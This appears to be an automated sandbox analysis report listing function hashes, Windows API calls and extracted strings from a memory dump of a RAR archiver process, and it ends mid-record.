                                                                                                                                                                                                                                • Opcode ID: 81a0c4cc47bb6f8769579c9a8c642551102bf2f778f9bea038dbf468d6b78107
                                                                                                                                                                                                                                • Instruction ID: f9ea6df1e6f33821619d4372e9df54faeb670f2d77df6e6a535e2c67ec5b675e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81a0c4cc47bb6f8769579c9a8c642551102bf2f778f9bea038dbf468d6b78107
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E1D821A2868241FB209A28D4647FE6771FF42B88F4401B5DD6D8B7DAFE2D944FCB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                                • Instruction ID: 522662e3b5745bf327a3fe8641aace16243c600525d4d44bc59789036f6f50c1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B514672528BD194E7009F24E8441ED37A8FB44F88F18427AEA984B7DAEF395166C321
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                • Instruction ID: a808cb033ddaaa7eec052de590ff7cb05f19cd6988d52c892f982c5e74b09fb9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3418D21A0D68382FB69DB15D95027823A1EF84B40F0064B5D93ECB6D9FE3DE84F8740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3253501508-0
                                                                                                                                                                                                                                • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                • Instruction ID: 9588906b506fdfba2e0ff6962e323779d37f4d8ae233d2226637e053b7751e8d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5401961160C74286EB50EB16A4021BE5660BF85BD5F580472EEEDC77E9EE3FD45B8304
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                • Instruction ID: e6fb9c551687d31fcfdbc341b859a037416eca7d11e8aa20e78ce5fb57424d6a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9016250E0D6C343FF6897669A4427A53905F94BD4F4882B1ED3EC62D6FD2CE44B4200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CompareString
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1825529933-0
                                                                                                                                                                                                                                • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                • Instruction ID: a20a46d79a5e4e73c485fbcaed8de82c86fbc0424061b1715aab7702d3d439ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6014F6170CA9245EB106B16A40406AA721AB9AFC4F6C4874EFAD8BB9AFE3DD0474704
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA44549
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
• Instruction ID: 250e38e22614c46f1ce7cf9a5c01aa31efe2b4277abd9f1f3516fddc9e58b60c
• Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
• Instruction Fuzzy Hash: B3F02222A0834245FB258F60E4403783650EF00BB8F995370EA3D810EAEF39C89BC350
APIs
  • Part of subcall function 00007FF6FAA649F4: LoadStringW.USER32 ref: 00007FF6FAA64A7B
  • Part of subcall function 00007FF6FAA649F4: LoadStringW.USER32 ref: 00007FF6FAA64A94
  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
• swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA46CB0
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: LoadString$Sleepfflushswprintf
• String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
• API String ID: 668332963-4283793440
• Opcode ID: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
• Instruction ID: e0c11290221466017725a67c46680d3369b73a62cbdbe4c358159678b67aefc6
• Opcode Fuzzy Hash: 42bb3ba92369322cee946050bf619a3c7a8610c4ef9213de2fd911fc31fd2034
• Instruction Fuzzy Hash: 1722DA22A0C6C255EB60DB24D9410F967A1FF45744F4450B6EA9D876EAFF2EE60FC700
APIs
• CreateFileW.KERNEL32 ref: 00007FF6FAA3D4A6
• CloseHandle.KERNEL32 ref: 00007FF6FAA3D4B9
  • Part of subcall function 00007FF6FAA3EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF73
  • Part of subcall function 00007FF6FAA3EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF84
  • Part of subcall function 00007FF6FAA3EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6FAA3EFA7
  • Part of subcall function 00007FF6FAA3EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6FAA3EFCA
  • Part of subcall function 00007FF6FAA3EF50: GetLastError.KERNEL32 ref: 00007FF6FAA3EFD4
  • Part of subcall function 00007FF6FAA3EF50: CloseHandle.KERNEL32 ref: 00007FF6FAA3EFE7
• CreateDirectoryW.KERNEL32 ref: 00007FF6FAA3D4C6
• CreateFileW.KERNEL32 ref: 00007FF6FAA3D64A
• DeviceIoControl.KERNEL32 ref: 00007FF6FAA3D68B
• CloseHandle.KERNEL32 ref: 00007FF6FAA3D69A
• GetLastError.KERNEL32 ref: 00007FF6FAA3D6AD
• RemoveDirectoryW.KERNEL32 ref: 00007FF6FAA3D6FA
• DeleteFileW.KERNEL32 ref: 00007FF6FAA3D705
  • Part of subcall function 00007FF6FAA42310: FlushFileBuffers.KERNEL32 ref: 00007FF6FAA4233E
  • Part of subcall function 00007FF6FAA42310: SetFileTime.KERNEL32 ref: 00007FF6FAA423DB
  • Part of subcall function 00007FF6FAA41930: CloseHandle.KERNELBASE ref: 00007FF6FAA41958
  • Part of subcall function 00007FF6FAA439E0: SetFileAttributesW.KERNEL32(?,00007FF6FAA434EE,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA43A0F
  • Part of subcall function 00007FF6FAA439E0: SetFileAttributesW.KERNEL32(?,00007FF6FAA434EE,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA43A3C
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                                • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                                • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                • Instruction ID: 76b45633b32183103ba1018613e24c02a694a5d08b873fc2440ae8764f410e4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86D1CD26A1878696EB609F60E9412F973A0FF44798F404171EAAD876D9EF3DD60FC700
APIs
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AEE9
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AF01
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AF19
• GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AF75
• GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6AFB0
• SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6B23B
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6B244
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6FAA22E4C), ref: 00007FF6FAA6B287
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
• String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
• API String ID: 3483800833-4165214152
APIs
Strings
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3729174658-3733053543
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E2F7
  • Part of subcall function 00007FF6FAA3EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF73
  • Part of subcall function 00007FF6FAA3EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6FAA3EE47), ref: 00007FF6FAA3EF84
  • Part of subcall function 00007FF6FAA3EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6FAA3EFA7
  • Part of subcall function 00007FF6FAA3EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6FAA3EFCA
  • Part of subcall function 00007FF6FAA3EF50: GetLastError.KERNEL32 ref: 00007FF6FAA3EFD4
  • Part of subcall function 00007FF6FAA3EF50: CloseHandle.KERNEL32 ref: 00007FF6FAA3EFE7
• DeviceIoControl.KERNEL32 ref: 00007FF6FAA3E357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6FAA22014), ref: 00007FF6FAA3E362
Strings
Similarity
• API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
• String ID: SeBackupPrivilege
• API String ID: 3094086963-2429070247
APIs
Strings
Similarity
• API ID: Sleepswprintf
• String ID: $%ls%0*u.rev
• API String ID: 407366315-3491873314
                                                                                                                                                                                                                                • Opcode ID: cf0b1d2e1f3f42edb60452bbb24115177953f6343aa4cee769ccba7d12699e54
                                                                                                                                                                                                                                • Instruction ID: e9d18068532cb2ce1d677239b789344c092e67281d46ba9707ed636ea2a608b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf0b1d2e1f3f42edb60452bbb24115177953f6343aa4cee769ccba7d12699e54
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73020632A046928AEB20DF29E4442ADB7A5FB887C4F400175DE6D877D9FE3CE44AC704
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • new.LIBCMT ref: 00007FF6FAA24BD8
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA6B6D0: Sleep.KERNEL32(?,?,?,?,00007FF6FAA3CBED,?,00000000,?,00007FF6FAA67A8C), ref: 00007FF6FAA6B730
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: CreateFileW.KERNELBASE ref: 00007FF6FAA41F4A
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: GetLastError.KERNEL32 ref: 00007FF6FAA41F59
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: CreateFileW.KERNELBASE ref: 00007FF6FAA41F99
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: GetLastError.KERNEL32 ref: 00007FF6FAA41FA2
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA41E80: SetFileTime.KERNEL32 ref: 00007FF6FAA41FF1
                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$SleepTime
• String ID: %12s %s$%12s %s$ $%s
• API String ID: 2965465231-221484280
• Opcode ID: 7d1b61a8460396aa639ed059bb8fcb6c49571c58dc1953f366533a0ff62c8f64
• Instruction ID: 7c5831cca1b5b6f4b5239e874dbf19097e9372574a609d53915a31e038c39ce2
• Opcode Fuzzy Hash: 7d1b61a8460396aa639ed059bb8fcb6c49571c58dc1953f366533a0ff62c8f64
• Instruction Fuzzy Hash: DBF1C022B09A4286EB60DF12D4412BE67A1FB89B84F4440B6DA6D877C5FF3DD56AC700
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
• Instruction ID: 14e29c9d2d192cc628f55a479940116135dc5ffc3dc13f1b948b145b73e9c106
